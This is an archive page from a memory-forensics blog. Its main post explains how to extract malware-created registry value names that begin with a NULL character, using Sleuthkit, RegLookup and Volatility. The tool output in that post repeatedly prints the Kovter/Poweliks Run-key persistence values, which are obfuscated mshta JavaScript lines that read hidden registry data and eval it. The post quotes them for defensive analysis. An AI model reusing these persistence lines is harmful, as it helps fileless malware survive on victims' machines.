JL's stuff: a boring blog about my interests, projects and research... by Jamie Levy (<a href="http://www.blogger.com/profile/16089000750284843256">Blogger profile</a>)<br />
<br />
<b>Enfuse Materials</b> (2016-05-25)<br />
I'd like to thank everyone for coming to my talks at Enfuse 2016. As promised, here are the materials for the course. I ask that you don't redistribute the materials elsewhere. You must use the password given to you in class, and the link will expire in 30 days:<br />
<br />
<a href="https://www.dropbox.com/sh/j5svwjm7kse28i3/AACBTcZQYPgikxYPx_c3E7Apa?dl=0">https://www.dropbox.com/sh/j5svwjm7kse28i3/AACBTcZQYPgikxYPx_c3E7Apa?dl=0</a><br />
<br />
For those who were asking about other available memory samples, we have several available on the <a href="https://github.com/volatilityfoundation/volatility/wiki/Memory-Samples">Volatility Wiki</a>. We also have memory samples available from our <a href="http://www.memoryanalysis.net/#!amf/cmg5">training website</a>, as well as a lab guide and answer sheet for those of you who asked about using memory samples for your college course materials.
As always, feel free to send me an email if you have any Volatility issues or questions.<br />
<br />
<b>Registry Value Names Starting with NULL Characters</b> (2016-01-29)<br />
Recently someone asked on a mailing list how to extract the registry value names created by a particular piece of malware. The issue was a <tt>NULL</tt> (<tt>0x0</tt>) character at the beginning of the registry value name, which prevented <tt>regedit</tt> from opening the registry key. The name is actually there, however: it consists of this <tt>NULL</tt> character followed by some other hex characters, and you can extract it from the raw registry itself (from disk and from memory). We'll cover how to accomplish this, and then, as was asked in a follow-up question, how to accomplish it across the enterprise.<br />
<h2>Background</h2>
The malware in question is referenced in a <a href="http://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update">report by Symantec</a> as well as by <a href="https://reaqta.com/2015/09/poweliks-file-less-malware-keeps-evolving/">REAQTA</a>. There are two different registry values, depending on whether or not PowerShell is available on the machine. Either way, the registry keys and values created by the malware are present in the user's personal registry hive (<tt>NTUSER.DAT</tt>).
<h2>
Extracting the Registry</h2>
For this part, you may use anything that allows you to pull the registry file from the disk. Some example tools may be:
<ul><li><a href="http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.2.0">FTK Imager</a></li>
<li><a href="https://www.x-ways.net/forensics/index-m.html">X-Ways</a></li>
<li><a href="https://www2.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx">EnCase</a></li>
<li><a href="http://www.sleuthkit.org/">Sleuthkit</a> (or Autopsy if you need a GUI)</li>
</ul>
We're going to use the Sleuthkit to extract the registry file from the local disk in this case (though the process would be the same for an offline or remote disk, just the disk name would differ). So first we need to figure out the offset of the NTFS volume. In order to accomplish that, we would use the <tt>mmls</tt> utility; we see its invocation on line <b>1</b> below. The volume offset is highlighted on line <b>9</b> and we see that it is the only NTFS volume on this disk. Next, we need to get the unique identifying information (<tt>inode</tt>) for the <tt>NTUSER.DAT</tt> registry file for the user who ran the malware (<b>lines 11-23</b>). After we've identified the <tt>inode</tt> number for the registry file (372), we then extract it from the disk so that we may process it offline (<b>line 26</b>).
<pre><p class="code1">
1 <b>>mmls \\.\PhysicalDrive0</b>
2 DOS Partition Table
3 Offset Sector: 0
4 Units are in 512-byte sectors
5
6 Slot Start End Length Description
7 00: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
8 01: ----- 0000000000 0000002047 0000002048 Unallocated
9 02: 00:00 <b><span style="color: red;">0000002048</span></b> 0033552383 0033550336 <b><span style="color: red;">NTFS (0x07)</span></b>
10
11 <b>>fls -o 2048 -p -r \\.\physicaldrive0 > paths.txt</b>
12
13 <b>>findstr /i ntuser paths.txt</b>
15 r/r 10772-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
16 r/r 41237-128-3: Users/Default/NTUSER.DAT
17 r/r 41238-128-4: Users/Default/NTUSER.DAT.LOG
18 r/r 10768-128-4: Users/Default/NTUSER.DAT.LOG1
19 r/r 41321-128-1: Users/Default/NTUSER.DAT.LOG2
20 r/r 10563-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
21 r/r 10773-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
22 r/r 433-128-1: Users/user/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
23 <b><font color="red">r/r 372-128-1: Users/user/NTUSER.DAT</font></b>
24 [snip]
25
26 <b>>icat -o 2048 \\.\physicaldrive0 372 > ntuser-win7x86</b>
</p>
</pre>
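The three Sleuthkit steps above (find the NTFS start sector with <tt>mmls</tt>, find the hive's inode with <tt>fls</tt>, extract it with <tt>icat</tt>) are easy to script once the tool output is parsed, which matters as soon as you have more than one disk to process. The following is an added example of mine, not code from the original post or from the Sleuthkit project: it parses the NTFS offset out of <tt>mmls</tt> output and the <tt>NTUSER.DAT</tt> MFT entry out of <tt>fls -p -r</tt> output, then builds the <tt>icat</tt> command line. The sample output strings are constructed from the listing above (with a deleted duplicate entry added to exercise the filtering); the device and user names are assumptions.

```python
import re

# Constructed sample output, modelled on the mmls and fls listings in the post.
MMLS_OUTPUT = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000002047   0000002048   Unallocated
02:  00:00   0000002048   0033552383   0033550336   NTFS (0x07)
"""

# Constructed: an allocated and a deleted ('*') NTUSER.DAT for the same user,
# plus the log/transaction files that 'findstr /i ntuser' would also list.
FLS_OUTPUT = """\
r/r 41237-128-3: Users/Default/NTUSER.DAT
r/r 41238-128-4: Users/Default/NTUSER.DAT.LOG
r/r 433-128-1: Users/user/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
r/r * 371-128-1: Users/user/NTUSER.DAT
r/r 372-128-1: Users/user/NTUSER.DAT
d/d 10000-144-1: Users/user/AppData
"""

# mmls row: "02:  00:00   0000002048   0033552383   0033550336   NTFS (0x07)"
MMLS_ROW = re.compile(r"^(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.+)$")
# fls row:  "r/r 372-128-1: Users/user/NTUSER.DAT"  (deleted entries carry a '*')
FLS_ROW = re.compile(r"^([a-z-])/([a-z-])\s+(\*\s+)?(\d+)-(\d+)-(\d+):\s*(.+)$")


def ntfs_volume_offsets(mmls_text):
    """Start sectors of every NTFS volume in mmls output (normally exactly one)."""
    offsets = []
    for line in mmls_text.splitlines():
        m = MMLS_ROW.match(line.strip())
        if m and m.group(6).startswith("NTFS"):
            offsets.append(int(m.group(3)))
    return offsets


def find_ntuser_inode(fls_text, user):
    """MFT entry number of the allocated Users/<user>/NTUSER.DAT, or None.

    Only the exact hive file is returned: the .LOG* transaction logs and the
    .TM.blf / .regtrans-ms files are skipped, as are deleted (starred) entries.
    """
    wanted = "Users/%s/NTUSER.DAT" % user
    for line in fls_text.splitlines():
        m = FLS_ROW.match(line.strip())
        if not m or m.group(3):          # no match, or a deleted entry
            continue
        if m.group(1) == "r" and m.group(7) == wanted:
            return int(m.group(4))
    return None


def plan_extraction(mmls_text, fls_text, device, user, outfile):
    """Combine both parsers into the icat argv list and the output file name."""
    offsets = ntfs_volume_offsets(mmls_text)
    if len(offsets) != 1:
        raise ValueError("expected one NTFS volume, found %d" % len(offsets))
    inode = find_ntuser_inode(fls_text, user)
    if inode is None:
        raise LookupError("no allocated NTUSER.DAT for user %r" % user)
    # icat -o <offset> <device> <inode> > <outfile>, as on line 26 above
    return ["icat", "-o", str(offsets[0]), device, str(inode)], outfile


if __name__ == "__main__":
    argv, out = plan_extraction(MMLS_OUTPUT, FLS_OUTPUT, r"\\.\PhysicalDrive0",
                                "user", "ntuser-win7x86")
    print(" ".join(argv), ">", out)
```

Refusing to proceed when more than one NTFS volume is found is deliberate: on a multi-volume disk the hive you want may live on a data volume, so the choice should be made by the analyst rather than silently taking the first match.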
<h2>
Print Keys and Values</h2>
Once we have the extracted registry file, we're able to print out the registry key and its values using any offline tool we have at our disposal. Here are a few:
<ul><li><a href="http://projects.sentinelchicken.org/reglookup/">RegLookup</a></li>
<li><a href="https://github.com/williballenthin/python-registry">Python-Registry</a></li>
<li><a href="https://github.com/keydet89/RegRipper2.8">RegRipper</a></li>
<li><a href="http://www.mitec.cz/wrr.html">Mitec WRR</a></li>
</ul>
RegLookup is a nice utility for printing out registry data. You can see example output for the Run key below; note, however, that the value name is not printed, even though everything else is:
<pre><p class="code1">
<b>$ reglookup -p 'Software/Microsoft/Windows/CurrentVersion/Run' NTUSER-Win7x86.DAT</b>
PATH,TYPE,VALUE,MTIME
/Software/Microsoft/Windows/CurrentVersion/Run,KEY,,2016-01-15 21:49:46
/Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:roh0Urp=\x22ehdEAR8I\x22;G9p=new%20ActiveXObject(\x22WScript.Shell\x22);c7r6vhuiFM=\x22moDW7uoJ5\x22;ibh29z=G9p.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);bZU38ElgI=\x229g95uXT\x22;eval(ibh29z);v4SXZYYP=\x22x2\x22;,
/Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:hCLkQp43l=\x22GRB\x22;w5s1=new%20ActiveXObject(\x22WScript.Shell\x22);dXx1Yr6f=\x22uk\x22;S6RUd=w5s1.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);JTMRIu3=\x227Vi\x22;eval(S6RUd);Jkxju49At=\x225S\x22;,
</p></pre>
I also <a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/printkey.py">wrote a script to use Python-Registry</a> in order to print out registry keys of interest. You can see example output from this below:
<pre> <p class="code1">
<b>$ python printkey.py NTUSER-Win7x86.DAT "Software\Microsoft\Windows\CurrentVersion\Run"</b>
Processing NTUSER-Win7x86.DAT
************************************************************************
cmi-createhive{6a1c4018-979d-4291-a7dc-7aed1c75b67c}\software\microsoft\windows\currentversion\run
VALUENAME: 996883f7
VALUE: mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
VALUENAME: e4263fbd
VALUE: mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
Subkeys:
************************************************************************
</p></pre>
<a href="http://windowsir.blogspot.com/2016/01/more-registry-fun.html">Harlan Carvey also wrote a RegRipper plugin</a> to detect key and value names with NULL characters. If you need a GUI, <a href="http://binaryforay.blogspot.com/2016/01/registry-values-starting-with-null.html">Eric Zimmerman's registry tool</a> also parses these names correctly. So in short, you have a lot of options for parsing out these "broken" value names with offline tools.
<h2>
Printing Keys and Values Using Volatility</h2>
As you may guess, you can also get this information using <a href="https://github.com/volatilityfoundation/volatility">Volatility</a>, but it might not be as straightforward at first. For our first attempt, we will try to use the <tt>printkey</tt> plugin. Notice that the value name is actually blank in the output below (left side of the colon):
<pre><p class="code1">
<b>$ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 printkey -K software\\microsoft\\windows\\currentversion\\run</b>
Volatility Foundation Volatility Framework 2.5
Legend: (S) = Stable (V) = Volatile
----------------------------
[snip]
Registry: \??\C:\Users\user\ntuser.dat
Key name: Run (S)
Last updated: 2016-01-15 21:49:45 UTC+0000
Subkeys:
Values:
REG_SZ : (S) mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
REG_SZ : (S) mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
</p></pre>
<p>This is because of the way the String class was written: it treats the name as a NULL-terminated string, so a name that begins with NULL is rendered as empty. The actual name is still there, however, so we can extract it with <tt>volshell</tt>. In the code below, lines 4-7 import the RegistryApi and select the correct registry file (in this case the <tt>NTUSER.DAT</tt> of the user named "user"). Line 8 gets the key of interest, the "Run" key (defined on line 6). Then lines 10-11 loop through the (raw) values contained in that key and print the <tt>dt()</tt> output for each value.</p>
<p>We can see on lines 15 and 25 that each of these value names has a length of 9; therefore, we should be able to extract a name for these values. We can see the raw bytes of the name by calling the <tt>.v()</tt> function on the object of interest, in this case the <tt>.Name</tt> member of the value. On lines 34-35 we get the correct length for the value name, and on lines 36-37 we get the correct value name (the leading NULL is simply invisible when printed, which is why eight characters appear for a nine-byte name). We can then rerun our loop on line 39 to get the full information for these values.</p>
<pre><p class="code1">
<font color="blue"> 1</font> <b>$ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 volshell</b>
<font color="blue"> 2</font> [snip]
<font color="blue"> 3</font>
<font color="blue"> 4</font> In [1]: import volatility.plugins.registry.registryapi as registryapi
<font color="blue"> 5</font> In [2]: regapi = registryapi.RegistryApi(self._config)
<font color="blue"> 6</font> In [3]: key = "software\\microsoft\\windows\\currentversion\\run"
<font color="blue"> 7</font> In [4]: regapi.set_current("NTUSER.DAT", "user")
<font color="blue"> 8</font> In [5]: item = regapi.reg_get_key(None, key)
<font color="blue"> 9</font>
<font color="blue"> 10</font> In [6]: for value, data in regapi.reg_yield_values(None, key, given_root = item, <b>raw = True</b>):
<font color="blue"> 11</font> print dt(value)
<font color="blue"> 12</font> ....:
<font color="blue"> 13</font> <CType pointer to [0x0007CC08]>
<font color="blue"> 14</font> 0x0 : Signature vk
<font color="blue"> 15</font> 0x2 : <b><font color="red">NameLength 9</font></b>
<font color="blue"> 16</font> 0x4 : DataLength 412
<font color="blue"> 17</font> 0x8 : Data 511024
<font color="blue"> 18</font> 0xc : Type 1
<font color="blue"> 19</font> 0x10 : Flags 1
<font color="blue"> 20</font> 0x12 : Spare 28515
<font color="blue"> 21</font> 0x14 : <b><font color="red">Name
<font color="blue"> 22</font> None</font></b>
<font color="blue"> 23</font> <CType pointer to [0x0007CDD0]>
<font color="blue"> 24</font> 0x0 : Signature vk
<font color="blue"> 25</font> 0x2 : <b><font color="red">NameLength 9</font></b>
<font color="blue"> 26</font> 0x4 : DataLength 378
<font color="blue"> 27</font> 0x8 : Data 517464
<font color="blue"> 28</font> 0xc : Type 1
<font color="blue"> 29</font> 0x10 : Flags 1
<font color="blue"> 30</font> 0x12 : Spare 0
<font color="blue"> 31</font> 0x14 : <b><font color="red">Name
<font color="blue"> 32</font> None</font></b>
<font color="blue"> 33</font>
<font color="blue"> 34</font> In [7]: <b>len(value.Name.v())</b>
<font color="blue"> 35</font> <b><font color="red">Out[7]: 9</font></b>
<font color="blue"> 36</font> In [8]: <b>print str(value.Name.v())</b>
<font color="blue"> 37</font> <b><font color="red">e4263fbd</font></b>
<font color="blue"> 38</font>
<font color="blue"> 39</font> In [9]: <b>for value, data in regapi.reg_yield_values(None, key, given_root = item, raw = True):
print value.Name.v(), data</b>
....:
<b><font color="red">996883f7</font></b> mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
<b><font color="red">e4263fbd</font></b> mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
</p></pre>
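To see why a NULL-terminated string reader (RegLookup's blank name above, Volatility's String class here) drops these names while a length-aware reader keeps them, here is an added example of mine, not code from Volatility or python-registry. It builds value-key ("vk") cells with the layout shown in the <tt>dt()</tt> output above and parses them both ways, then flags any value whose name starts with NULL. The cell bytes are constructed to match the two names, lengths and data offsets in the listing, plus one benign control value; the meaning of the Flags bit (0x1 = 8-bit name rather than UTF-16) is taken from the regf on-disk format, not from this post.

```python
import struct

# Layout of a hive "vk" (value key) cell, matching the dt() output above:
# 0x0 Signature, 0x2 NameLength, 0x4 DataLength, 0x8 Data, 0xc Type,
# 0x10 Flags, 0x12 Spare, 0x14 Name (NameLength bytes, NOT NULL-terminated).
VK_HEADER = struct.Struct("<2sHIIIHH")
VK_FLAG_COMP_NAME = 0x0001   # regf flag: name stored as 8-bit chars, not UTF-16LE
REG_SZ = 1


def build_vk_cell(name, data_length, data_offset, value_type=REG_SZ,
                  flags=VK_FLAG_COMP_NAME):
    """Construct a vk cell body (sample data for this example, not a real hive)."""
    return VK_HEADER.pack(b"vk", len(name), data_length, data_offset,
                          value_type, flags, 0) + name


def parse_vk(cell):
    """Decode the header and slice out exactly NameLength bytes of name."""
    sig, name_len, data_len, data_off, vtype, flags, _spare = \
        VK_HEADER.unpack_from(cell, 0)
    if sig != b"vk":
        raise ValueError("not a vk cell")
    raw_name = cell[VK_HEADER.size:VK_HEADER.size + name_len]
    if len(raw_name) != name_len:
        raise ValueError("cell truncated: expected %d name bytes" % name_len)
    return {"name_length": name_len, "data_length": data_len,
            "data_offset": data_off, "type": vtype, "flags": flags,
            "raw_name": raw_name}


def name_as_c_string(raw_name):
    """What a NULL-terminated string reader sees: an empty name for these values."""
    return raw_name.split(b"\x00", 1)[0].decode("latin-1")


def name_length_aware(raw_name, flags):
    """Decode all NameLength bytes, honouring the 8-bit/UTF-16 flag."""
    if flags & VK_FLAG_COMP_NAME:
        return raw_name.decode("latin-1")
    return raw_name.decode("utf-16-le")


def printable(name):
    """Escape non-printables so the leading NULL shows up as \\x00 in a report."""
    return "".join(c if 32 <= ord(c) < 127 else "\\x%02x" % ord(c) for c in name)


def values_with_null_names(cells):
    """(escaped name, data length) for every value whose name begins with NULL."""
    hits = []
    for cell in cells:
        vk = parse_vk(cell)
        name = name_length_aware(vk["raw_name"], vk["flags"])
        if name.startswith("\x00"):
            hits.append((printable(name), vk["data_length"]))
    return hits


# Constructed sample cells: the two names, lengths and data offsets follow the
# dt() output in the post; the third value is a benign control.
SAMPLE_CELLS = [
    build_vk_cell(b"\x00996883f7", 412, 511024),
    build_vk_cell(b"\x00e4263fbd", 378, 517464),
    build_vk_cell(b"OneDrive", 100, 600000),
]

if __name__ == "__main__":
    for cell in SAMPLE_CELLS:
        vk = parse_vk(cell)
        print("C-string view: %r   length-aware view: %s" % (
            name_as_c_string(vk["raw_name"]),
            printable(name_length_aware(vk["raw_name"], vk["flags"]))))
    print("flagged:", values_with_null_names(SAMPLE_CELLS))
```

The <tt>values_with_null_names</tt> pass is the check you would run over a hive's value cells in a triage script: a value name that begins with NULL cannot be opened in <tt>regedit</tt>, so its presence under a persistence key like Run is itself worth reporting, and escaping the name keeps it legible in the report.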
<p>Unfortunately, that's all the time we have for today, but we'll continue this thought sometime next week. Until then, <a href="https://www.youtube.com/watch?v=Wkb8sl_VTAE">here's a bit of homework for you to watch</a> and <a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/fresponse/fresponse.bash">a bit to read</a>.</p>
<p><b>Coming up next: Finding interesting registry values Enterprise-wide</b></p>
<br />
<b>Volshell Quickies</b> (2015-06-03)<br />
Since someone had asked about it in a comment on this blog, I decided to write up a <a href="http://volatility-labs.blogspot.com/2015/06/volshell-quickie-case-of-missing.html">Volshell Quickie on the Volatility Labs blog</a>. Enjoy!<br />
<br />
<b>Linux Memory Forensics: Using mprotect() with PROT_NONE</b> (2015-05-18)<br />
In case you didn't catch it on the <a href="http://volatility-labs.blogspot.com/2015/05/using-mprotect-protnone-on-linux.html">Volatility Labs blog</a>, I found an interesting bug that we've had in the framework since we added Linux support. If you've had cases that involved Linux samples and plugins like <tt>linux_yarascan</tt>, <tt>linux_strings</tt>, etc., you might want to update to the latest code and have another look over those samples. Of course, there's no reason to think that a piece of malware might have used this trick and used a <tt>sigsegv</tt> handler to access the data, but <a href="http://metal-memenc.sourceforge.net/">the idea has been around for years...</a><br />
<br />
<b>Some Updates</b> (2015-01-29)<br />
Wow, it's been a while since I've written here. <a href="http://volatility-labs.blogspot.com/2014/12/acquiring-memories-from-2014.html">A lot has happened since, however.</a> Here are a few updates:<br />
<br />
<h2>
The Book</h2>
We released a book: <i><a href="http://www.memoryanalysis.net/#!amf/cmg5">The Art of Memory Forensics</a></i>. For those of you who are considering teaching memory forensics or even operating systems, we have a syllabus and evidence files on our website that you may use in your classes. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://static.wixstatic.com/media/2cde34_e9745d20e7124c41bffb28e42a5244ec.png_srz_p_227_285_75_22_0.50_1.20_0.00_png_srz" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://static.wixstatic.com/media/2cde34_e9745d20e7124c41bffb28e42a5244ec.png_srz_p_227_285_75_22_0.50_1.20_0.00_png_srz" /></a></div>
<h2>
Trainings</h2>
We have <a href="http://www.memoryanalysis.net/#!training/c1o4z">several trainings</a> in line for this year, public and private. Public trainings currently include:<br />
<br />
<ul>
<li>Reston, VA April 13th-17th 2015</li>
<li>New York, NY May 11th-15th 2015</li>
<li>Amsterdam, NL August 31st-September 4th 2015</li>
</ul>
We are also currently working on new course offerings coming out this year. So keep an eye out for those!<br />
<br />
<h2>
Talks</h2>
<div>
I'll be speaking at the upcoming <a href="http://www.encase.com/ceic">CEIC conference</a> in Las Vegas, on Wednesday May 20th 2015. Apparently there is a discount code if you register before January 31st: JANS4v15</div>
<div>
<br /></div>
<div>
The Volatility team will also give another talk at <a href="http://www.meetup.com/NYC4SEC/">NYC4SEC</a> during the week of the training in NYC this coming May. More details will be given for that talk soon.</div>
<br />
<b>Volatility Talk at Upcoming NYC4SEC</b> (2014-04-14)<br />
The Volatility team will give a talk at the next NYC4SEC meetup on memory forensics on May 8th, 2014 at John Jay College. Make sure to <a href="http://www.meetup.com/NYC4SEC/events/177092222/">RSVP if you are planning to attend</a>, since there is limited seating!<br />
<br />
<i><b> Thanks For the Memory: Rootkits, Exfil and APT - RAM Conquers All </b></i><br />
<br />
<i>The ability to perform digital investigations and incident response
is becoming a critical skill for many occupations. Unfortunately,
digital investigators frequently lack the training or experience to take
advantage of the volatile artifacts found in physical memory. Volatile
memory contains valuable information about the runtime state of the
system, provides the ability to link artifacts from traditional forensic
analysis (network, file system, registry), and provides the ability to
ascertain investigative leads that have been unbeknownst to most
analysts. Malicious adversaries have been leveraging this knowledge
disparity to undermine many aspects of the digital investigation process
with such things as anti-forensics techniques, memory resident malware,
kernel rootkits, encryption (file systems, network traffic, etc), and
Trojan defenses. The only way to turn-the-tables and defeat a creative
digital human adversary is through talented analysts.</i><br />
<br />
<i>This talk demonstrates the importance of including Volatile memory in
your investigations with an overview of the most widely used memory
forensics tool, Volatility, by its developers.</i><br />
<br />
-<a href="https://twitter.com/gleeda">@gleeda </a><br />
<br />
<b>New Volatility Training Website</b> (2014-02-07)<br />
We have a new website for all of our Volatility training opportunities. Don't forget to check it out: <a href="http://www.memoryanalysis.net/">http://www.memoryanalysis.net/</a><br />
<br />
- <a href="https://twitter.com/gleeda">@gleeda</a><br />
<br />
<b>OMFW 2013 Slides</b> (2014-01-30)<br />
In case you missed it, I put up my slides for my OMFW 2013 talk "Every Step You Take: Profiling the System". You can find them <a href="https://docs.google.com/presentation/d/1sW55qi4EOVEp9_-glUwVWIyUKrMZBFEl45dxawK-xf0/edit?usp=sharing">on Google Docs</a>. Some of the animations may not render properly, even when played, but you get the idea. If you want to see the <a href="http://volatility-labs.blogspot.com/2013/09/leveraging-cybox-with-volatility.html">cyboxer plugin</a>, send me an email (jamie.levy {at} gmail . com).<br />
<br />
<b>Volatility News</b> (2013-07-16)<br />
Things have been busy lately, but I want to let you know about some important items that are coming up quickly:<br />
<br />
<h2>
<b><span style="font-size: large;">July 27-30th, 2013: Blackhat Vegas</span></b></h2>
<br />
<a href="https://twitter.com/attrc">Andrew Case</a> and I will teach our course in <a href="https://www.blackhat.com/us-13/training/digital-forensics-and-incident-response.html">Digital Forensics and Incident Response</a> again this summer at Black Hat Vegas. This course will cover enough material to take someone from knowing practically nothing about digital forensics (disk and memory) to a point where s/he can comfortably conduct his/her own investigations. There is limited time to sign up, so reserve your seat while you can!<br />
<br />
You can hear Andrew talk about <a href="http://packetpushers.net/healthy-paranoia-show-14-digital-forensics-and-incident-response-with-andrew-case/">Digital Forensics and Incident Response</a> on the Healthy Paranoia podcast from July 7th, 2013.<br />
<br />
<h2>
<b><span style="font-size: large;">August 1st, 2013: Volatility Plugin Contest</span></b></h2>
<br />
The <a href="http://volatility-labs.blogspot.com/2013/01/the-1st-annual-volatility-framework.html">1st Annual Volatility Plugin Contest</a> deadline is quickly approaching! Don't miss this opportunity to win over $2000 in cash and prizes and contribute to the top memory forensics framework by writing a plugin for the <a href="http://code.google.com/p/volatility/">Volatility Framework</a> and submitting it to <u><b><span style="background-color: black; color: white;">volcon2013@memoryanalysis.net</span></b></u> by August 1st, 2013.<br />
<br />
<h2>
<b><span style="font-size: large;">September 9-13th, 2013: Volatility Training in the Netherlands</span></b></h2>
<br />
We will have our 4th public offering of our official <a href="http://volatility-labs.blogspot.com/2013/04/memory-forensics-training-netherlands.html"><i>Windows Malware and Memory Forensics</i> training</a> in the Netherlands September 9-13, 2013. This will be our <b>only</b> offering outside the US for this year. Past offerings of our course have been well received and were recently described as the <a href="http://volatility-labs.blogspot.com/2013/06/the-perfect-combination-of-ir-malware.html">"<i>... perfect combination of incident response, malware analysis and Windows internals.</i>"</a> Don't miss out on your chance to take this course and learn not only how to become a Volatility superuser, but how to apply cutting edge memory and malware analysis methodologies against your worst adversary.<br />
<br />
<h2>
<b><span style="font-size: large;">November 4th, 2013: Open Memory Forensics Workshop (OMFW)</span></b></h2>
<br />
<a href="https://www.volatilesystems.com/default/omfw">The <i>Open Memory Forensics Workshop</i> (OMFW) call for papers has been announced</a>. If you want to give a talk on memory forensics related topics, please get your submission in by <u><i>September 1st, 2013</i></u>. OMFW is a half-day workshop that will be held one day prior to the Open Source Digital Forensics Conference in Chantilly, VA. This workshop is fast-paced, to the point, highly technical and intended to raise the bar for analysts who realize the importance of memory forensics when faced with a highly skilled adversary. Not only will you learn a lot and get to meet all the movers and shakers in the space, but your $50 registration fee is entirely donated to charity! <a href="http://volatility.tumblr.com/post/13348425876/the-volatility-community-gives-back">Last year</a> all proceeds went to the <a href="http://www.missingkids.com/">National Center for Missing and Exploited Children</a>. So don't delay: there really is limited seating and it does go quickly. Make sure to register your seat now!<br />
<br />
<h2>
<b><span style="font-size: large;">November 5th, 2013: Open Source Digital Forensics Conference</span></b></h2>
<br />
The <a href="https://twitter.com/volatility">Volatility</a> team will be at the <i><a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">Open Source Digital Forensics Conference</a></i> discussing <i>The State of Volatility</i>. Come by and see us there :-)<br />
<br />
<h2>
<b><span style="font-size: large;">November 11-15th, 2013: Volatility Training in Reston, VA</span></b></h2>
<br />
We will have our 5th public offering of the official <a href="http://volatility-labs.blogspot.com/2013/06/memory-forensics-training-reston-va.html"><i>Windows Malware and Memory Forensics</i> training</a> in Reston, VA November 11-15th, 2013. If you missed the last offering in June, this is your chance to take this course and learn from the developers themselves. As I've <a href="http://gleeda.blogspot.com/2013/04/upcoming-events-and-trainings.html">stated before</a>, this class includes real-world scenarios that are reinforced with hands-on labs. We cover more than "just one tool" as some detractors like to say. We cover methodologies that will actually help you where some tools fail. You will have a deep enough understanding to investigate even the most skilled adversaries who know how to break common tools in order to hide. Don't be fooled and don't be left behind. Accept no imitations and make sure to take this class.<br />
<br />
All students who take the official <a href="https://twitter.com/volatility">Volatility</a> training receive a certificate of completion, with CPE credits that can be used for certification renewal. In addition to this, we are constantly updating the course with new material and <a href="https://twitter.com/volatility/status/347500624629334016">past students are given updated materials for FREE</a>. What more can you ask for? If you are interested in Volatility training, drop us a line at <u><b>voltraining [[ at ]] memoryanalysis.net</b></u><br />
<br />
If you want to see co-trainers <a href="https://twitter.com/iMHLv2">MHL</a> and <a href="https://twitter.com/attrc">Andrew Case (attrc)</a> in action, I managed to find a couple of videos of their previous talks on youtube:<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/OeG4KBWB-EY" width="560"></iframe><br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/Khnas55TV0w" width="420"></iframe><br />
<br />
<br />
<b>Upcoming Events and Trainings</b> (2013-04-19)<br />
I have several speaking and training events coming up this year that may be of interest to others in the community:<br />
<br />
I will be speaking at the New York Banker's Association's upcoming <a href="http://www.nyba.com/events/10th-annual-technology-compliance-risk-management-forum/">Annual Technology, Compliance & Risk Management Forum</a> on May 16th, 2013 on the topic of Incident Response and Digital Forensics. If you plan to attend I'll see you there!<br />
<br />
